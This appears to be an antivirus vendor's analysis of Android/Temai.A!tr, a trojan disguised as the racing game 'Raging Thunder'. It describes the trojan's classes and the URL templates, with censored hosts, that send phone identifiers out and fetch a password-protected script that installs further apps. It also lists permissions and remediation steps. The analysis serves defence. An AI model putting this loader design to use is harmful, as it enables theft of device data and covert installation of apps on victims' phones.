Android/Temai.A!tr
Analysis
Android/Temai.A!tr is a piece of malware targetting Android mobile phones.
The trojan comes disguised as a car racing game called 'Raging Thunder' however, in the background, it registers the infected phone on a remote website (with its IMEI, IMSI, SIM card number etc.) and then downloads another password protected ZIP file.
This file is, in fact, a script file and opens up a backdoor and allows the download and installation of other possibly malicious applications on the victim's phone.
Technical Details
The main application is called Raging Thunder (refer Fig1) and comes in a package called 'com.polarbit.rthunderliteok'
Fig1 : Legitimate application icon
The malicious package contains the following important classes :
- com.polarbit.rthunderliteok.rthunderlite : This class is the main activity of the application and is launched every time the application is opened. Apart from loading the legitimate functions of the class, it also calls the class com.simpleg.simpleg
- com.simpleg.simpleg : It launches the service MyService (described below) and sends out an HTTP request to the URL
http://[CENSORED]iu.net/control.html?imei="+IMEI +"&sim="+SIM No+"&imsi="+IMSI+"&model=" +Build.MODEL+"&release="+Build.VERSION.RELEASE +"&qd="+[channelnumber]+"&gamename=" +[Application Package Name]
where the value [channelnumber] is specified as meta-data for MyService in the package's AndroidManifest.xml file - com.simpleg.MyService : This service launches a new thread and calls the MDK class with parameter "0000000194" (we speculate this is a number specific to each package distributing the trojan)
- superpack.fscriptME.MDK : It sends out an HTTP GET request to
http://[CENSORED]ai.com:5222/kspp/do?imei=" + IMEI + "&wid=0000000194&type=&step=0
As a response, a password protected ZIP file is received. The class then decrypts this file with a hard-coded password.
The received file is, in fact, an FScript file and is executed using the class AdScript - superpack.fscriptME.AdScript : This file runs the downloaded script file that contains the malicious functions that allows the download and installation of further possibly malicious applications on the infected phone
Permissions required by the application:
- READ_PHONE_STATE
- WRITE_EXTERNAL_STORAGE
- ACCESS_FINE_LOCATION
- ACCESS_NETWORK_STATE
- com.android.vending.BILLING
- RESTART_PACKAGES
- ACCESS_WIFI_STATE
- ACCESS_NETWORK_STATE
- INTERNET
- READ_PHONE_STATE
- GET_TASKS
- MOUNT_UNMOUNT_FILESYSTEMS
- WRITE_APN_SETTINGS
- CHANGE_NETWORK_STATE
- CHANGE_WIFI_STATE
- WRITE_EXTERNAL_STORAGE
- VIBRATE
- WAKE_LOCK
- INSTALL_SHORTCUT
- INTERNET
- ACCESS_COARSE_LOCATION
Recommended Action
- FortiGate Systems
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
FortiClient Systems
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiGate | |
---|---|
Extreme | |
FortiClient | |
Extended | |
FortiMail | |
Extended | |
FortiSandbox | |
Extended | |
FortiWeb | |
Extended | |
Web Application Firewall | |
Extended | |
FortiIsolator | |
Extended | |
FortiDeceptor | |
Extended | |
FortiEDR |